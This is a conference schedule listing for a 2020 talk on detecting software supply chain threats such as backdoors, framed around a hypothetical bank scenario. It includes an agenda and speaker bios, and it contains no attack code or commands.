Back To Schedule
Saturday, March 28 • 2:00pm - 2:30pm
Software Supply Chain Threat Detection

Sign up or log in to save this to your schedule, view media, leave feedback and see who's attending!

Feedback form is now closed.

Scenario: Recently XYZ Bank received complaints from customers who closed their online account and had not received the requested check for their remaining balance. XYZ Bank found a SQL backdoor which altered the mailing address of closed accounts to a suspicious offshore address. The escalation that followed raised these concerns amongst XYZ InfoSec, XYZ IT, and the software consultants that developed their online banking application: 
•    How many customers were impacted?  
•    The SOC team had confirmed that external network traffic did not install this backdoor. Where then did it come from? 
•    How many people had access to the source code repositories? 
•    What other code might have been backdoored? 
It is a common trend for global organizations to utilize an onsite-offshore delivery model, wherein software development teams are outsourced to various parts of the world including countries known for active cyber offenses or working conditions that leave knowledge workers bitter and disgruntled. 
To check for security issues, these organizations perform static analysis, code review, dynamic analysis, and penetration testing, to name a few. These techniques discover coding defects such as buffer overflow and cross-site scripting but cannot typically find malicious code such as backdoors and logic bombs. 
In a production enterprise environment, the security operations team monitors for external threats, primarily network attacks, malware, and ransomware. Their tooling is informed by threat intelligence feeds designed to detect patterns of global external attackers, not threats coming from inside the enterprise. 
This presentation provides insight into: 
1.    What is Software Supply Chain Threat Detection? 
2.    How is it different from other defect discovery methods? 
3.    Motive behind such threats in the software world 
4.    How is threat detection performed? 
5.    Points of interest to look for 
6.    Real world scenarios- backdoors, suspicious constructs 
7. Outcome of Software Supply Chain Threat detection - passive and active monitoring

Zoom link: https://zoom.us/j/266304316

avatar for Diaspina Ghosh

Diaspina Ghosh

Security Consultant, Synopsys
Diaspina Ghosh works as a Security Consultant at Synopsys, Inc. She has six years of experience in software security that includes penetration testing, source code review, business continuity planning and application risk ranking. Being a consultant, she also supports her clients... Read More →
avatar for Michael Doyle

Michael Doyle

Mike Doyle is a Prinicipal Consultant for Synopsys and is an open source developer. He has served in previous roles as a commercial software developer, a security analyst, and a software security consultant. He has spoken at local, regional, and national conferences and has delivered... Read More →

Saturday March 28, 2020 2:00pm - 2:30pm EDT
'Connect' track 3333 Busbee Dr NW, Kennesaw, GA 30144, USA